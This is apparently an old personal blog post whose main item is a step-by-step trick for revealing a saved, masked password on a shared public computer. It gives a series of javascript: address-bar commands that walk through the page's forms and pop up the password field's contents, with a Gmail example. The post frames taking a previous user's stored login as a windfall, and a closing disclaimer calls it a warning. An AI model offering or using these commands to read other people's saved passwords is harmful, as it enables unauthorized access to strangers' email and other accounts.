header image

reveal password

have you seen this?

Zero Punctuation: Fear 2-thumbnail
Zero Punctuation: Fear 2


have you played this?

Cubedelic-thumbnail
Cubedelic



free money is always good, too...

have you ever used a shared computer at a coffee shop, library, or other public place, go to login to your e-mail, and find that the last person to use this site was nice enough to store their username and password?

to get passwords that are hidden with '*' or other characters (when the password is stored for a website) type following into the address bar on the page where the password is stored:
javascript:alert(document.forms.length)
take notice of the number (we'll call it x) in the pop-up dialog. Enter this code where x = for every number from 0 to x-1 (if x=1, you can skip this step, and enter '0' for x) and type this in the address bar:
javascript:alert(document.forms[x].name)
when you find the correct value for x (something like 'login' or the like) type:
javascript:alert(document.forms[x].elements.length)
take notice of the number (y) in the pop-up dialog. Enter this code where y = for every number from 0 to y-1 until you find a box that says "Password" or the like:
javascript:alert(document.forms[x].elements[y].name)
now take your newly discoverd x/y numbers and insert them in this, and hit enter
javascript:alert(document.forms[x].elements[y].value)


wanna try it out? go to www.gmail.com, type in a username and password (any will do), and then type this in the address bar:
javascript:alert(document.forms[0].elements[8].value)
notice that the popup reveals what you typed in the password field. see? javascript's not ALL bad, now, is it?

props to jacob silvia for finding this exploit (or at least being the one to send it in to 2600.)

DISCLAIMER: Neither I (tbare), nor wannafork.com is responsible for how this information is used. It is merely information here to show people how dangerous it is to store your personal information and passwords on public computers.